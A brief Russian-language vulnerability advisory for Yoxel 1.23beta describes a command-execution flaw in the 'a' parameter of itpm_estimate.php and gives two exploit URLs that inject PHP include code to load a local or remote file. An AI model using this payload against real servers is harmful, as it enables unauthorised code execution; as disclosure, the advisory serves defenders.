Программа: Yoxel 1.23beta

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «a» сценарием itpm_estimate.php. Удаленный пользователь может
выполнить произвольные команды на целевой системе.

Эксплоит:

http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php?
a=LOCAL_OR_REMOTE_FILE&rid=1&proj_id=);include($_GET[a]);die(2

http://site.com/[yoxel_v1.23beta]/itpm/itpm_estimate.php? a=LOCAL_OR_REMOTE_FILE&proj_id=);include($_GET[a]);die(2



Оставить мнение